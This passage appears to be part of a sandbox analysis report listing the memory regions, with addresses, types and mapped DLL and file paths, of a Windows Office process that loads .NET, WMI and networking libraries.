entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002730000"
filename = ""
Region:
id = 394
start_va = 0x97a0000
end_va = 0x989ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000097a0000"
filename = ""
Region:
id = 395
start_va = 0x7fef8d00000
end_va = 0x7fef8f13fff
entry_point = 0x7fef8d00000
region_type = mapped_file
name = "grooveex.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\grooveex.dll")
Region:
id = 396
start_va = 0x7fffff7c000
end_va = 0x7fffff7dfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7c000"
filename = ""
Region:
id = 397
start_va = 0x99b0000
end_va = 0x9aaffff
entry_point = 0x0
region_type = private
name = "private_0x00000000099b0000"
filename = ""
Region:
id = 398
start_va = 0x9ab0000
end_va = 0x9c68fff
entry_point = 0x9ab0000
region_type = mapped_file
name = "office.odf"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf")
Region:
id = 399
start_va = 0x9ce0000
end_va = 0x9ddffff
entry_point = 0x0
region_type = private
name = "private_0x0000000009ce0000"
filename = ""
Region:
id = 400
start_va = 0x7fef7c90000
end_va = 0x7fef7cc4fff
entry_point = 0x7fef7c90000
region_type = mapped_file
name = "ehstorshell.dll"
filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll")
Region:
id = 401
start_va = 0x7fef7cd0000
end_va = 0x7fef854dfff
entry_point = 0x7fef7cd0000
region_type = mapped_file
name = "grooveintlresource.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\grooveintlresource.dll")
Region:
id = 402
start_va = 0x7fffff78000
end_va = 0x7fffff79fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff78000"
filename = ""
Region:
id = 403
start_va = 0x7fffff7a000
end_va = 0x7fffff7bfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7a000"
filename = ""
Region:
id = 404
start_va = 0x2a10000
end_va = 0x2a10fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a10000"
filename = ""
Region:
id = 405
start_va = 0x2a20000
end_va = 0x2a20fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a20000"
filename = ""
Region:
id = 406
start_va = 0x2a30000
end_va = 0x2a30fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a30000"
filename = ""
Region:
id = 407
start_va = 0x2c70000
end_va = 0x2c70fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002c70000"
filename = ""
Region:
id = 408
start_va = 0x2e80000
end_va = 0x2f7ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002e80000"
filename = ""
Region:
id = 409
start_va = 0x2f80000
end_va = 0x2f80fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002f80000"
filename = ""
Region:
id = 410
start_va = 0x2f90000
end_va = 0x2f90fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002f90000"
filename = ""
Region:
id = 411
start_va = 0x2fa0000
end_va = 0x2fa0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002fa0000"
filename = ""
Region:
id = 412
start_va = 0x2fb0000
end_va = 0x2fb0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002fb0000"
filename = ""
Region:
id = 413
start_va = 0x4790000
end_va = 0x4790fff
entry_point = 0x0
region_type = private
name = "private_0x0000000004790000"
filename = ""
Region:
id = 414
start_va = 0x49a0000
end_va = 0x49a0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000049a0000"
filename = ""
Region:
id = 415
start_va = 0x4c90000
end_va = 0x4c90fff
entry_point = 0x0
region_type = private
name = "private_0x0000000004c90000"
filename = ""
Region:
id = 416
start_va = 0x4ca0000
end_va = 0x4ca0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000004ca0000"
filename = ""
Region:
id = 417
start_va = 0x4cb0000
end_va = 0x4cb0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000004cb0000"
filename = ""
Region:
id = 418
start_va = 0x4cc0000
end_va = 0x4cc0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000004cc0000"
filename = ""
Region:
id = 419
start_va = 0x4dd0000
end_va = 0x4dd0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000004dd0000"
filename = ""
Region:
id = 420
start_va = 0x4de0000
end_va = 0x4de0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000004de0000"
filename = ""
Region:
id = 421
start_va = 0x4df0000
end_va = 0x4df0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000004df0000"
filename = ""
Region:
id = 422
start_va = 0x5680000
end_va = 0x5680fff
entry_point = 0x0
region_type = private
name = "private_0x0000000005680000"
filename = ""
Region:
id = 423
start_va = 0x5690000
end_va = 0x5690fff
entry_point = 0x0
region_type = private
name = "private_0x0000000005690000"
filename = ""
Region:
id = 424
start_va = 0x56a0000
end_va = 0x56a0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000056a0000"
filename = ""
Region:
id = 425
start_va = 0x56b0000
end_va = 0x56b0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000056b0000"
filename = ""
Region:
id = 426
start_va = 0x56c0000
end_va = 0x56c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000056c0000"
filename = ""
Region:
id = 427
start_va = 0x56d0000
end_va = 0x56d0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000056d0000"
filename = ""
Region:
id = 428
start_va = 0x58e0000
end_va = 0x58e0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000058e0000"
filename = ""
Region:
id = 429
start_va = 0x58f0000
end_va = 0x58f0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000058f0000"
filename = ""
Region:
id = 430
start_va = 0x5900000
end_va = 0x5900fff
entry_point = 0x0
region_type = private
name = "private_0x0000000005900000"
filename = ""
Region:
id = 431
start_va = 0x5910000
end_va = 0x5910fff
entry_point = 0x0
region_type = private
name = "private_0x0000000005910000"
filename = ""
Region:
id = 432
start_va = 0x5920000
end_va = 0x5920fff
entry_point = 0x0
region_type = private
name = "private_0x0000000005920000"
filename = ""
Region:
id = 433
start_va = 0x59b0000
end_va = 0x59b0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000059b0000"
filename = ""
Region:
id = 434
start_va = 0x59c0000
end_va = 0x59c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000059c0000"
filename = ""
Region:
id = 435
start_va = 0x5a50000
end_va = 0x5a50fff
entry_point = 0x0
region_type = private
name = "private_0x0000000005a50000"
filename = ""
Region:
id = 436
start_va = 0x5a60000
end_va = 0x5a60fff
entry_point = 0x0
region_type = private
name = "private_0x0000000005a60000"
filename = ""
Region:
id = 437
start_va = 0x5a70000
end_va = 0x5a70fff
entry_point = 0x0
region_type = private
name = "private_0x0000000005a70000"
filename = ""
Region:
id = 438
start_va = 0x6e90000
end_va = 0x6e90fff
entry_point = 0x0
region_type = private
name = "private_0x0000000006e90000"
filename = ""
Region:
id = 439
start_va = 0x6ea0000
end_va = 0x6ea0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000006ea0000"
filename = ""
Region:
id = 440
start_va = 0x6eb0000
end_va = 0x6eb0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000006eb0000"
filename = ""
Region:
id = 441
start_va = 0x6ec0000
end_va = 0x6ec0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000006ec0000"
filename = ""
Region:
id = 442
start_va = 0x9de0000
end_va = 0x9edffff
entry_point = 0x0
region_type = private
name = "private_0x0000000009de0000"
filename = ""
Region:
id = 443
start_va = 0x7fef7c00000
end_va = 0x7fef7c0bfff
entry_point = 0x7fef7c00000
region_type = mapped_file
name = "cscdll.dll"
filename = "\\Windows\\System32\\cscdll.dll" (normalized: "c:\\windows\\system32\\cscdll.dll")
Region:
id = 444
start_va = 0x7fef7c10000
end_va = 0x7fef7c8dfff
entry_point = 0x7fef7c10000
region_type = mapped_file
name = "cscui.dll"
filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll")
Region:
id = 445
start_va = 0x7fffff74000
end_va = 0x7fffff75fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff74000"
filename = ""
Region:
id = 446
start_va = 0x7fffff76000
end_va = 0x7fffff77fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff76000"
filename = ""
Region:
id = 447
start_va = 0x6ed0000
end_va = 0x6ed1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006ed0000"
filename = ""
Region:
id = 448
start_va = 0x7fef7bf0000
end_va = 0x7fef7bfefff
entry_point = 0x7fef7bf0000
region_type = mapped_file
name = "cscapi.dll"
filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll")
Region:
id = 449
start_va = 0x7fef7b70000
end_va = 0x7fef7beffff
entry_point = 0x7fef7b70000
region_type = mapped_file
name = "ntshrui.dll"
filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll")
Region:
id = 450
start_va = 0x7fefd540000
end_va = 0x7fefd562fff
entry_point = 0x7fefd540000
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 451
start_va = 0x2400000
end_va = 0x2401fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002400000"
filename = ""
Region:
id = 452
start_va = 0x2570000
end_va = 0x2581fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002570000"
filename = ""
Region:
id = 453
start_va = 0x2590000
end_va = 0x259efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002590000"
filename = ""
Region:
id = 454
start_va = 0x29e0000
end_va = 0x29f1fff
entry_point = 0x0
region_type = private
name = "private_0x00000000029e0000"
filename = ""
Region:
id = 455
start_va = 0x2a20000
end_va = 0x2a3efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a20000"
filename = ""
Region:
id = 456
start_va = 0x6ee0000
end_va = 0x6f27fff
entry_point = 0x0
region_type = private
name = "private_0x0000000006ee0000"
filename = ""
Region:
id = 457
start_va = 0x93a0000
end_va = 0x93e7fff
entry_point = 0x0
region_type = private
name = "private_0x00000000093a0000"
filename = ""
Region:
id = 458
start_va = 0x9670000
end_va = 0x976ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000009670000"
filename = ""
Region:
id = 459
start_va = 0x9ee0000
end_va = 0x9fdffff
entry_point = 0x0
region_type = private
name = "private_0x0000000009ee0000"
filename = ""
Region:
id = 460
start_va = 0x7fef65d0000
end_va = 0x7fef65edfff
entry_point = 0x7fef65d0000
region_type = mapped_file
name = "msohev.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\MSOHEV.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msohev.dll")
Region:
id = 461
start_va = 0x7fffff72000
end_va = 0x7fffff73fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff72000"
filename = ""
Region:
id = 462
start_va = 0x2590000
end_va = 0x2590fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002590000"
filename = ""
Region:
id = 463
start_va = 0x2720000
end_va = 0x2721fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 464
start_va = 0x58e0000
end_va = 0x58fefff
entry_point = 0x0
region_type = private
name = "private_0x00000000058e0000"
filename = ""
Region:
id = 465
start_va = 0x5a50000
end_va = 0x5a6efff
entry_point = 0x0
region_type = private
name = "private_0x0000000005a50000"
filename = ""
Region:
id = 466
start_va = 0x6e90000
end_va = 0x6eb0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000006e90000"
filename = ""
Region:
id = 467
start_va = 0x7000000
end_va = 0x701efff
entry_point = 0x0
region_type = private
name = "private_0x0000000007000000"
filename = ""
Region:
id = 468
start_va = 0x7fefc660000
end_va = 0x7fefc68bfff
entry_point = 0x7fefc660000
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 469
start_va = 0x7fef50d0000
end_va = 0x7fef50defff
entry_point = 0x7fef50d0000
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 470
start_va = 0x7fef5240000
end_va = 0x7fef52c5fff
entry_point = 0x7fef5240000
region_type = mapped_file
name = "wbemcomn.dll"
filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")
Region:
id = 471
start_va = 0xa130000
end_va = 0xa1affff
entry_point = 0x0
region_type = private
name = "private_0x000000000a130000"
filename = ""
Region:
id = 472
start_va = 0x7fef4ed0000
end_va = 0x7fef4ee3fff
entry_point = 0x7fef4ed0000
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 473
start_va = 0x7fef50e0000
end_va = 0x7fef5106fff
entry_point = 0x7fef50e0000
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 474
start_va = 0x7fef5110000
end_va = 0x7fef51f1fff
entry_point = 0x7fef5110000
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 475
start_va = 0x7fefd170000
end_va = 0x7fefd191fff
entry_point = 0x7fefd170000
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 476
start_va = 0x7fefcc80000
end_va = 0x7fefcccbfff
entry_point = 0x7fefcc80000
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 477
start_va = 0x7fee52d0000
end_va = 0x7fee5389fff
entry_point = 0x7fee52d0000
region_type = mapped_file
name = "uiautomationcore.dll"
filename = "\\Windows\\System32\\UIAutomationCore.dll" (normalized: "c:\\windows\\system32\\uiautomationcore.dll")
Region:
id = 478
start_va = 0x7fef22f0000
end_va = 0x7fef2343fff
entry_point = 0x7fef22f0000
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 479
start_va = 0x2a00000
end_va = 0x2a00fff
entry_point = 0x2a00000
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 480
start_va = 0x98a0000
end_va = 0x991ffff
entry_point = 0x98a0000
region_type = mapped_file
name = "~wrf{4de4a383-97a4-4d68-9d7d-ace2c9869090}.tmp"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRF{4DE4A383-97A4-4D68-9D7D-ACE2C9869090}.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.word\\~wrf{4de4a383-97a4-4d68-9d7d-ace2c9869090}.tmp")
Region:
id = 481
start_va = 0x7fee4270000
end_va = 0x7fee441ffff
entry_point = 0x7fee4270000
region_type = mapped_file
name = "comsvcs.dll"
filename = "\\Windows\\System32\\comsvcs.dll" (normalized: "c:\\windows\\system32\\comsvcs.dll")
Region:
id = 482
start_va = 0x2a10000
end_va = 0x2a10fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002a10000"
filename = ""
Region:
id = 483
start_va = 0x2c70000
end_va = 0x2c70fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002c70000"
filename = ""
Region:
id = 484
start_va = 0xa320000
end_va = 0xa39ffff
entry_point = 0x0
region_type = private
name = "private_0x000000000a320000"
filename = ""
Region:
id = 485
start_va = 0x75360000
end_va = 0x75428fff
entry_point = 0x75360000
region_type = mapped_file
name = "msvcr80.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll")
Region:
id = 486
start_va = 0x7fee38d0000
end_va = 0x7fee426cfff
entry_point = 0x7fee38d0000
region_type = mapped_file
name = "mscorwks.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorwks.dll")
Region:
id = 487
start_va = 0x2f80000
end_va = 0x2f82fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002f80000"
filename = ""
Region:
id = 488
start_va = 0x2f90000
end_va = 0x2f90fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002f90000"
filename = ""
Region:
id = 489
start_va = 0x9400000
end_va = 0x941ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000009400000"
filename = ""
Region:
id = 490
start_va = 0x9fe0000
end_va = 0xa0dffff
entry_point = 0x0
region_type = private
name = "private_0x0000000009fe0000"
filename = ""
Region:
id = 491
start_va = 0xa1d0000
end_va = 0xa2cffff
entry_point = 0x0
region_type = private
name = "private_0x000000000a1d0000"
filename = ""
Region:
id = 492
start_va = 0xa3a0000
end_va = 0xa4a0fff
entry_point = 0x0
region_type = private
name = "private_0x000000000a3a0000"
filename = ""
Region:
id = 493
start_va = 0xa570000
end_va = 0xa57ffff
entry_point = 0x0
region_type = private
name = "private_0x000000000a570000"
filename = ""
Region:
id = 494
start_va = 0xa580000
end_va = 0x2257ffff
entry_point = 0x0
region_type = private
name = "private_0x000000000a580000"
filename = ""
Region:
id = 495
start_va = 0x22580000
end_va = 0x22c4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000022580000"
filename = ""
Region:
id = 496
start_va = 0x22d50000
end_va = 0x22e4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000022d50000"
filename = ""
Region:
id = 497
start_va = 0x22ee0000
end_va = 0x22fdffff
entry_point = 0x0
region_type = private
name = "private_0x0000000022ee0000"
filename = ""
Region:
id = 498
start_va = 0x7fee29f0000
end_va = 0x7fee38cbfff
entry_point = 0x7fee29f0000
region_type = mapped_file
name = "mscorlib.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll")
Region:
id = 499
start_va = 0x7ff00040000
end_va = 0x7ff0004ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00040000"
filename = ""
Region:
id = 500
start_va = 0x7ff00050000
end_va = 0x7ff0005ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00050000"
filename = ""
Region:
id = 501
start_va = 0x7ff00060000
end_va = 0x7ff000fffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00060000"
filename = ""
Region:
id = 502
start_va = 0x7ff00100000
end_va = 0x7ff0010ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00100000"
filename = ""
Region:
id = 503
start_va = 0x7ff00110000
end_va = 0x7ff0017ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00110000"
filename = ""
Region:
id = 504
start_va = 0x7fffff6c000
end_va = 0x7fffff6dfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff6c000"
filename = ""
Region:
id = 505
start_va = 0x7fffff6e000
end_va = 0x7fffff6ffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff6e000"
filename = ""
Region:
id = 506
start_va = 0x7fffff70000
end_va = 0x7fffff71fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff70000"
filename = ""
Region:
id = 507
start_va = 0x7fee1eb0000
end_va = 0x7fee1fbcfff
entry_point = 0x7fee1eb0000
region_type = mapped_file
name = "system.enterpriseservices.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.EnterpriseSe#\\a6155c70b3df6c860303ffee7b560ade\\System.EnterpriseServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.enterprisese#\\a6155c70b3df6c860303ffee7b560ade\\system.enterpriseservices.ni.dll")
Region:
id = 508
start_va = 0x7fee1fc0000
end_va = 0x7fee29e2fff
entry_point = 0x7fee1fc0000
region_type = mapped_file
name = "system.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System\\adff7dd9fe8e541775c46b6363401b22\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system\\adff7dd9fe8e541775c46b6363401b22\\system.ni.dll")
Region:
id = 509
start_va = 0x7ffffec0000
end_va = 0x7ffffecffff
entry_point = 0x0
region_type = private
name = "private_0x000007ffffec0000"
filename = ""
Region:
id = 510
start_va = 0x7ffffed0000
end_va = 0x7fffff5ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ffffed0000"
filename = ""
Region:
id = 511
start_va = 0x2fa0000
end_va = 0x2faffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002fa0000"
filename = ""
Region:
id = 512
start_va = 0x4790000
end_va = 0x4794fff
entry_point = 0x4790000
region_type = mapped_file
name = "sorttbls.nlp"
filename = "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp" (normalized: "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp")
Region:
id = 513
start_va = 0x49a0000
end_va = 0x49a0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000049a0000"
filename = ""
Region:
id = 514
start_va = 0x9920000
end_va = 0x9960fff
entry_point = 0x9920000
region_type = mapped_file
name = "sortkey.nlp"
filename = "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp" (normalized: "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp")
Region:
id = 515
start_va = 0x516f00000
end_va = 0x516fc5fff
entry_point = 0x516f00000
region_type = mapped_file
name = "diasymreader.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\diasymreader.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\diasymreader.dll")
Region:
id = 516
start_va = 0x4c90000
end_va = 0x4c92fff
entry_point = 0x4c90000
region_type = mapped_file
name = "l_intl.nls"
filename = "\\Windows\\System32\\l_intl.nls" (normalized: "c:\\windows\\system32\\l_intl.nls")
Region:
id = 517
start_va = 0x7ff00180000
end_va = 0x7ff0018ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00180000"
filename = ""
Region:
id = 518
start_va = 0x4ca0000
end_va = 0x4ca0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004ca0000"
filename = ""
Region:
id = 519
start_va = 0x9630000
end_va = 0x9650fff
entry_point = 0x9630000
region_type = mapped_file
name = "system.enterpriseservices.wrapper.dll"
filename = "\\Windows\\assembly\\GAC_64\\System.EnterpriseServices\\2.0.0.0__b03f5f7f11d50a3a\\System.EnterpriseServices.Wrapper.dll" (normalized: "c:\\windows\\assembly\\gac_64\\system.enterpriseservices\\2.0.0.0__b03f5f7f11d50a3a\\system.enterpriseservices.wrapper.dll")
Region:
id = 520
start_va = 0x9770000
end_va = 0x9796fff
entry_point = 0x97797e6
region_type = mapped_file
name = "system.enterpriseservices.wrapper.dll"
filename = "\\Windows\\assembly\\GAC_64\\System.EnterpriseServices\\2.0.0.0__b03f5f7f11d50a3a\\System.EnterpriseServices.Wrapper.dll" (normalized: "c:\\windows\\assembly\\gac_64\\system.enterpriseservices\\2.0.0.0__b03f5f7f11d50a3a\\system.enterpriseservices.wrapper.dll")
Region:
id = 521
start_va = 0x9970000
end_va = 0x9996fff
entry_point = 0x99797e6
region_type = mapped_file
name = "system.enterpriseservices.wrapper.dll"
filename = "\\Windows\\assembly\\GAC_64\\System.EnterpriseServices\\2.0.0.0__b03f5f7f11d50a3a\\System.EnterpriseServices.Wrapper.dll" (normalized: "c:\\windows\\assembly\\gac_64\\system.enterpriseservices\\2.0.0.0__b03f5f7f11d50a3a\\system.enterpriseservices.wrapper.dll")
Region:
id = 522
start_va = 0x7fee1e30000
end_va = 0x7fee1ea0fff
entry_point = 0x7fee1e30000
region_type = mapped_file
name = "system.enterpriseservices.wrapper.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.EnterpriseSe#\\a6155c70b3df6c860303ffee7b560ade\\System.EnterpriseServices.Wrapper.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.enterprisese#\\a6155c70b3df6c860303ffee7b560ade\\system.enterpriseservices.wrapper.dll")
Region:
id = 523
start_va = 0x230b0000
end_va = 0x231affff
entry_point = 0x0
region_type = private
name = "private_0x00000000230b0000"
filename = ""
Region:
id = 524
start_va = 0x7fee1d30000
end_va = 0x7fee1e2cfff
entry_point = 0x7fee1d30000
region_type = mapped_file
name = "system.runtime.remoting.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Runtime.Remo#\\0fde44651bdf14a3988b955dd94aa318\\System.Runtime.Remoting.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.runtime.remo#\\0fde44651bdf14a3988b955dd94aa318\\system.runtime.remoting.ni.dll")
Region:
id = 525
start_va = 0x7ff00190000
end_va = 0x7ff0019ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00190000"
filename = ""
Region:
id = 526
start_va = 0x7fffff6a000
end_va = 0x7fffff6bfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff6a000"
filename = ""
Region:
id = 527
start_va = 0x7fee1be0000
end_va = 0x7fee1d22fff
entry_point = 0x7fee1be0000
region_type = mapped_file
name = "system.configuration.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Configuration\\091b931d0f6408001747dbbbb05dbe66\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.configuration\\091b931d0f6408001747dbbbb05dbe66\\system.configuration.ni.dll")
Region:
id = 528
start_va = 0x7fee1530000
end_va = 0x7fee1bd4fff
entry_point = 0x7fee1530000
region_type = mapped_file
name = "system.xml.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Xml\\ee795155543768ea67eecddc686a1e9e\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.xml\\ee795155543768ea67eecddc686a1e9e\\system.xml.ni.dll")
Region:
id = 529
start_va = 0x7fef3160000
end_va = 0x7fef317bfff
entry_point = 0x7fef3160000
region_type = mapped_file
name = "rasman.dll"
filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll")
Region:
id = 530
start_va = 0x7fef3180000
end_va = 0x7fef31e1fff
entry_point = 0x7fef3180000
region_type = mapped_file
name = "rasapi32.dll"
filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll")
Region:
id = 531
start_va = 0x7fefadc0000
end_va = 0x7fefadd0fff
entry_point = 0x7fefadc0000
region_type = mapped_file
name = "rtutils.dll"
filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll")
Region:
id = 532
start_va = 0x7fefcfe0000
end_va = 0x7fefd034fff
entry_point = 0x7fefcfe0000
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 533
start_va = 0x231b0000
end_va = 0x2341ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000231b0000"
filename = ""
Region:
id = 534
start_va = 0x7fefc9e0000
end_va = 0x7fefc9e6fff
entry_point = 0x7fefc9e0000
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll")
Region:
id = 535
start_va = 0x7fefcfd0000
end_va = 0x7fefcfd6fff
entry_point = 0x7fefcfd0000
region_type = mapped_file
name = "wship6.dll"
filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")
Region:
id = 536
start_va = 0x59b0000
end_va = 0x59cffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000059b0000"
filename = ""
Region:
id = 537
start_va = 0x23490000
end_va = 0x2358ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000023490000"
filename = ""
Region:
id = 538
start_va = 0x7fef6700000
end_va = 0x7fef6763fff
entry_point = 0x7fef6700000
region_type = mapped_file
name = "webio.dll"
